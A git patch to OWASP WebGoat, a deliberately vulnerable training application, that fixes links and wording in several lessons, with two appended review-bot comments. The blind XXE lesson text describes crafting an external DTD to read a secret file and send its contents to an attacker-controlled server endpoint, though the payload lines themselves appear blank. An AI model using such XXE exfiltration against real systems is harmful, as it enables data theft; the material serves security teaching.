From 98000d600213b9b0b16ddb0726170fb59a41d627 Mon Sep 17 00:00:00 2001
From: Nanne Baars
Date: Thu, 23 Mar 2017 09:37:53 +0100
Subject: [PATCH] Fixing links in several lessons

---
 README.MD | 2 +-
 .../src/main/resources/i18n/WebGoatLabels.properties | 2 +-
 webgoat-lessons/sol.txt | 2 +-
 .../owasp/webgoat/plugin/BlindSendFileAssignment.java | 2 +-
 .../src/main/resources/i18n/WebGoatLabels.properties | 2 +-
 .../src/main/resources/lessonPlans/en/XXE_blind.adoc | 6 +++---
 .../resources/lessonPlans/en/XXE_blind_assignment.adoc | 9 ++++++---
 webgoat-server/pom.xml | 10 +++++-----
 8 files changed, 19 insertions(+), 16 deletions(-)

diff --git a/README.MD b/README.MD
index 8453220ce..e5460ca72 100644
--- a/README.MD
+++ b/README.MD
@@ -100,7 +100,7 @@ On x86 you can build a container with the following commands:
 ```Shell
 cd WebGoat/
 mvn package
-cd webgoat-container
+cd webgoat-server
 mvn package
 mvn docker:build
 docker tag webgoat/webgoat-8.0 webgoat/webgoat-8.0:8.0
diff --git a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
index 3a581a904..9b9f75e31 100644
--- a/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/jwt/src/main/resources/i18n/WebGoatLabels.properties
@@ -1 +1 @@
-jwt.title=JWT tokens
+jwt.title=JWT tokens (Under development)
diff --git a/webgoat-lessons/sol.txt b/webgoat-lessons/sol.txt
index 9b1c2c0aa..c686e4396 100644
--- a/webgoat-lessons/sol.txt
+++ b/webgoat-lessons/sol.txt
@@ -41,7 +41,7 @@ Blind SendFile ... *
      *  
      *  
+     *  
      *  %remote;
      *   ]>
      *  
diff --git a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
index 6961b4fe3..69b0e8e1c 100644
--- a/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
+++ b/webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
@@ -114,7 +114,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
      * 
      *  
      *  
+     *  
      *  %remote;
      *   ]>
      *  
diff --git a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
index b00425df3..864ae5afb 100644
--- a/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
+++ b/webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
@@ -26,7 +26,7 @@ xxe.simple.output=Welcome {0} you can now login to our website
 xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
 xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed
 xxe.content.output=Welcome {0} you can now login to our website
-xxe.blind.output=Contents of the file is:
+xxe.blind.output=Contents of the file is: {0}
 
 xxe.hints.simple.xxe.1=Try submitting the form and see what happens
 xxe.hints.simple.xxe.2=XXE stands for XML External Entity attack
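Review bot: The `{0}` placeholder added to `xxe.blind.output` has no matching caller change in this patch. The only edit to BlindSendFileAssignment.java is a one-line Javadoc change, so please confirm that the code emitting this message already passes the file contents as its first argument; otherwise the literal `{0}` may reach the user. The substituted value is whatever text the lesson received, so it should be HTML-escaped if the feedback is rendered as markup. A comment above the key, such as `# {0} = file contents reported back to the user`, would document the argument.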
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
index 68cc95ccd..cd615ee26 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
@@ -4,7 +4,7 @@ In some cases you will see no output because although your attack might have wor
 Or the resource you are trying to read contains illegal XML character which causes the parser to fail.
 Let's start with an example, in this case we reference a external DTD which we control on our own server.
 
-Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server you control.*
+Our WebGoat server by default has an /xxe/ping endpoint which we can use. *This can be any server under your control.*
 
 [source]
 ----
@@ -33,7 +33,7 @@ Now submit the form and change the xml to:
 ----
 
 
+
 %remote;
 ]>
 
@@ -51,5 +51,5 @@ GET Java/1.8.0_101 HelloWorld
 So with the XXE we are able to ping our own server which means XXE injection is possible.
 
 [NOTE]
-In this case we use http://localhost:8080/WebGoat/plugin_lessons/plugin/XXE/test.dtd to fetch the dtd but in reality this will
+In this case we use http://localhost:8080/WebGoat/plugin_lessons/XXE/test.dtd to fetch the dtd but in reality this will
 of course be a host fully under the attackers control.
\ No newline at end of file
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
index 22c2bdff2..005df5198 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
@@ -1,7 +1,10 @@
 == Blind XXE assignment
 
-In the previous page we showed you how you can ping a server with a XXE attack, in this assigment try to make a DTD which will upload the
-contents of ~/.webgoat/plugin/XXE/secret.txt to our server. For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows
-this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+In the previous page we showed you how you can ping a server with a XXE attack, in this assignment try to make a DTD
+which will upload the contents of ~/.webgoat/plugin/XXE/secret.txt to our server.
+For Linux: `/home/USER/.webgoat/XXE/secret.txt`, for Windows this would be `c:/Users/USER/.webgoat/XXE/secret.txt`
+If you use the Docker based WebGoat environment this file is located here: `/root/.webgoat/XXE/secret.txt`
 
 Try to upload this file using the following endpoint: `http://localhost:8080/WebGoat/XXE/ping?text=[contents_file]` (NOTE: this endpoint is under your full control)
+
+You can login to the Docker container as follows: `docker exec -i -t <> /bin/bash`
\ No newline at end of file
diff --git a/webgoat-server/pom.xml b/webgoat-server/pom.xml
index 78d55dff2..8dff0cda9 100644
--- a/webgoat-server/pom.xml
+++ b/webgoat-server/pom.xml
@@ -86,11 +86,11 @@
             webgoat-container
             ${project.version}
         
-        
-            org.owasp.webgoat.lesson
-            challenge
-            ${project.version}
-        
+        
+            
+            
+            
+        
         
             org.owasp.webgoat.lesson
             client-side-filtering
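Review bot: The `challenge` lesson dependency is removed from webgoat-server in this hunk, which the commit subject ("Fixing links in several lessons") does not mention. The five added lines show no text on this page, so the block was presumably commented out rather than deleted. If so, delete it or gate it behind a Maven profile, so that the set of lesson modules shipped in the server artifact is explicit. Either way, a one-line note in the pom such as `<!-- challenge lesson excluded: REASON -->` and a mention in the commit message would make the change auditable.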